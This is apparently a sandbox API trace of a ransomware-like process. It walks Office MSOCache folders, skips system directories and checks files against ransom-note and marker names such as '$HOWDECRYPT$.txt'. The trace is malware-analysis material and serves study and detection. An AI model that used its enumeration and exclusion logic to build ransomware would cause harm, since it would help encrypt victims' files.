wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.649] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.650] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0081.650] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.650] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0081.650] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.650] GetProcessHeap () returned 0x2c0000 [0081.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x322c10 [0081.650] GetProcessHeap () returned 0x2c0000 [0081.650] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x3c0) returned 0x336e08 [0081.650] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.650] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.650] lstrlenW (lpString="Windows") returned 7 [0081.650] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.651] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.651] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.651] lstrlenW (lpString="System Volume Information") returned 25 [0081.651] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.651] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.651] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.651] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0081.651] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.651] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0081.651] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.651] GetProcessHeap () returned 0x2c0000 [0081.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x322ce8 [0081.651] GetProcessHeap () returned 0x2c0000 [0081.651] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x3c8) returned 0x336e08 [0081.651] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.651] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="Windows") returned -1 [0081.651] lstrlenW (lpString="Windows") returned 7 [0081.651] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="$Recycle.bin") returned 1 [0081.652] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.652] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="System Volume Information") returned -1 [0081.652] lstrlenW (lpString="System Volume Information") returned 25 [0081.652] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 [0081.652] StrStrIW (lpFirst="Office32MUI.msi", lpSrch=".spyhunter") returned 0x0 [0081.652] lstrcmpW (lpString1="Office32MUI.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.652] lstrcmpW (lpString1="Office32MUI.msi", lpString2="_uninstalling_.png") returned 1 [0081.652] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 82 [0081.652] GetProcessHeap () returned 0x2c0000 [0081.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x320590 [0081.652] GetProcessHeap () returned 0x2c0000 [0081.652] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x3d0) returned 0x336e08 [0081.652] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.652] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="Windows") returned -1 [0081.652] lstrlenW (lpString="Windows") returned 7 [0081.652] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="$Recycle.bin") returned 1 [0081.652] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.652] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="System Volume Information") returned -1 [0081.653] lstrlenW (lpString="System Volume Information") returned 25 [0081.653] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0081.653] StrStrIW (lpFirst="Office32MUI.xml", lpSrch=".spyhunter") returned 0x0 [0081.653] lstrcmpW (lpString1="Office32MUI.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.653] lstrcmpW (lpString1="Office32MUI.xml", lpString2="_uninstalling_.png") returned 1 [0081.653] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 82 [0081.653] GetProcessHeap () returned 0x2c0000 [0081.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x320680 [0081.653] GetProcessHeap () returned 0x2c0000 [0081.653] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x3d8) returned 0x336e08 [0081.653] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.653] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="Windows") returned -1 [0081.653] lstrlenW (lpString="Windows") returned 7 [0081.653] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="$Recycle.bin") returned 1 [0081.653] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.653] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="System Volume Information") returned -1 [0081.653] lstrlenW (lpString="System Volume Information") returned 25 [0081.653] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0081.654] StrStrIW (lpFirst="OWOW32LR.cab", lpSrch=".spyhunter") returned 0x0 [0081.654] lstrcmpW (lpString1="OWOW32LR.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.654] lstrcmpW (lpString1="OWOW32LR.cab", lpString2="_uninstalling_.png") returned 1 [0081.654] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0081.654] GetProcessHeap () returned 0x2c0000 [0081.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x320770 [0081.654] GetProcessHeap () returned 0x2c0000 [0081.654] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x3e0) returned 0x336e08 [0081.654] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.654] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0081.654] lstrlenW (lpString="Windows") returned 7 [0081.654] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0081.654] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.654] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0081.655] lstrlenW (lpString="System Volume Information") returned 25 [0081.655] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.655] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0081.655] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.655] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0081.655] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.655] GetProcessHeap () returned 0x2c0000 [0081.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x325dd8 [0081.655] GetProcessHeap () returned 0x2c0000 [0081.655] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x3e8) returned 0x336e08 [0081.655] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0081.655] FindClose (in: hFindFile=0x335e20 | out: hFindFile=0x335e20) returned 1 [0081.656] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.656] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.656] GetProcessHeap () returned 0x2c0000 [0081.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x320960 [0081.656] GetProcessHeap () returned 0x2c0000 [0081.656] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x3f0) returned 0x336e08 [0081.657] GetProcessHeap () returned 0x2c0000 [0081.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0081.657] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0081.657] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0081.657] lstrlenW (lpString="Windows") returned 7 [0081.657] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0081.657] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.657] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0081.657] lstrlenW (lpString="System Volume Information") returned 25 [0081.657] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C") returned 66 [0081.658] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0081.658] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0081.658] GetProcessHeap () returned 0x2c0000 [0081.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0081.658] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*") returned 68 [0081.658] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335e20 [0081.823] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.823] lstrlenW (lpString="Windows") returned 7 [0081.823] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.823] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.823] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.823] lstrlenW (lpString="System Volume Information") returned 25 [0081.823] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.823] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.823] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0081.823] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.823] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0081.823] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.823] GetProcessHeap () returned 0x2c0000 [0081.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x322dc0 [0081.823] GetProcessHeap () returned 0x2c0000 [0081.823] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x3f8) returned 0x336e08 [0081.823] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.823] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.823] lstrlenW (lpString="Windows") returned 7 [0081.823] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.823] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.823] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.823] lstrlenW (lpString="System Volume Information") returned 25 [0081.823] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.824] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.824] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.824] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0081.824] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.824] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0081.824] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.824] GetProcessHeap () returned 0x2c0000 [0081.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x322e98 [0081.824] GetProcessHeap () returned 0x2c0000 [0081.824] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x400) returned 0x336e08 [0081.824] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.824] lstrcmpiW (lpString1="InfLR.cab", lpString2="Windows") returned -1 [0081.824] lstrlenW (lpString="Windows") returned 7 [0081.824] lstrcmpiW (lpString1="InfLR.cab", lpString2="$Recycle.bin") returned 1 [0081.824] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.824] lstrcmpiW (lpString1="InfLR.cab", lpString2="System Volume Information") returned -1 [0081.824] lstrlenW (lpString="System Volume Information") returned 25 [0081.824] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0081.824] StrStrIW (lpFirst="InfLR.cab", lpSrch=".spyhunter") returned 0x0 [0081.824] lstrcmpW (lpString1="InfLR.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.824] lstrcmpW (lpString1="InfLR.cab", lpString2="_uninstalling_.png") returned 1 [0081.824] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0081.824] GetProcessHeap () returned 0x2c0000 [0081.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x325ec0 [0081.825] GetProcessHeap () returned 0x2c0000 [0081.825] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x408) returned 0x336e08 [0081.825] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.825] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="Windows") returned -1 [0081.825] lstrlenW (lpString="Windows") returned 7 [0081.825] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="$Recycle.bin") returned 1 [0081.825] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.825] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="System Volume Information") returned -1 [0081.825] lstrlenW (lpString="System Volume Information") returned 25 [0081.825] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0081.825] StrStrIW (lpFirst="InfoPathMUI.msi", lpSrch=".spyhunter") returned 0x0 [0081.825] lstrcmpW (lpString1="InfoPathMUI.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.825] lstrcmpW (lpString1="InfoPathMUI.msi", lpString2="_uninstalling_.png") returned 1 [0081.825] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0081.825] GetProcessHeap () returned 0x2c0000 [0081.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x320c78 [0081.825] GetProcessHeap () returned 0x2c0000 [0081.825] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x410) returned 0x336e08 [0081.825] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.825] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="Windows") returned -1 [0081.825] lstrlenW (lpString="Windows") returned 7 [0081.825] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="$Recycle.bin") returned 1 [0081.825] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.825] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="System Volume Information") returned -1 [0081.825] lstrlenW (lpString="System Volume Information") returned 25 [0081.826] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0081.826] StrStrIW (lpFirst="InfoPathMUI.xml", lpSrch=".spyhunter") returned 0x0 [0081.826] lstrcmpW (lpString1="InfoPathMUI.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.826] lstrcmpW (lpString1="InfoPathMUI.xml", lpString2="_uninstalling_.png") returned 1 [0081.826] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0081.826] GetProcessHeap () returned 0x2c0000 [0081.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x337220 [0081.826] GetProcessHeap () returned 0x2c0000 [0081.826] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x336e08, Size=0x418) returned 0x337310 [0081.826] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.826] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0081.826] lstrlenW (lpString="Windows") returned 7 [0081.826] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0081.826] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.826] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0081.826] lstrlenW (lpString="System Volume Information") returned 25 [0081.826] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.826] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0081.826] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.826] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0081.826] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.826] GetProcessHeap () returned 0x2c0000 [0081.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x325fa8 [0081.826] GetProcessHeap () returned 0x2c0000 [0081.826] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x420) returned 0x337310 [0081.826] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0081.827] FindClose (in: hFindFile=0x335e20 | out: hFindFile=0x335e20) returned 1 [0081.827] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.827] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.827] GetProcessHeap () returned 0x2c0000 [0081.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x336e08 [0081.827] GetProcessHeap () returned 0x2c0000 [0081.828] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x428) returned 0x337310 [0081.828] GetProcessHeap () returned 0x2c0000 [0081.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0081.828] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0081.828] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0081.828] lstrlenW (lpString="Windows") returned 7 [0081.828] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0081.828] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.828] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0081.828] lstrlenW (lpString="System Volume Information") returned 25 [0081.828] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C") returned 66 [0081.828] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0081.828] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0081.828] GetProcessHeap () returned 0x2c0000 [0081.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0081.828] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*") returned 68 [0081.828] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335e20 [0081.828] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.828] lstrlenW (lpString="Windows") returned 7 [0081.828] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.828] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.829] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.829] lstrlenW (lpString="System Volume Information") returned 25 [0081.829] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.829] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.829] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0081.829] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.829] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0081.829] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.829] GetProcessHeap () returned 0x2c0000 [0081.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x322f70 [0081.829] GetProcessHeap () returned 0x2c0000 [0081.829] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x430) returned 0x337310 [0081.829] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.829] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.829] lstrlenW (lpString="Windows") returned 7 [0081.829] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.829] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.829] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.829] lstrlenW (lpString="System Volume Information") returned 25 [0081.829] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.829] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.829] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.829] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0081.829] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.829] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0081.829] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.829] GetProcessHeap () returned 0x2c0000 [0081.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x323048 [0081.830] GetProcessHeap () returned 0x2c0000 [0081.830] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x438) returned 0x337310 [0081.830] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.830] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0081.830] lstrlenW (lpString="Windows") returned 7 [0081.830] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0081.830] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.830] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0081.830] lstrlenW (lpString="System Volume Information") returned 25 [0081.830] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.830] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0081.830] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.830] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0081.830] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.830] GetProcessHeap () returned 0x2c0000 [0081.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x326090 [0081.830] GetProcessHeap () returned 0x2c0000 [0081.830] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x337310, Size=0x440) returned 0x337310 [0081.830] FindNextFileW (in: hFindFile=0x335e20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.830] lstrcmpiW (lpString1="VisioLR.cab", lpString2="Windows") returned -1 [0081.830] lstrlenW (lpString="Windows") returned 7 [0081.830] lstrcmpiW (lpString1="VisioLR.cab", lpString2="$Recycle.bin") returned 1 [0081.830] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.830] lstrcmpiW (lpString1="VisioLR.cab", lpString2="System Volume Information") returned 1 [0081.830] lstrlenW (lpString="System Volume Information") returned 25 [0081.830] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: 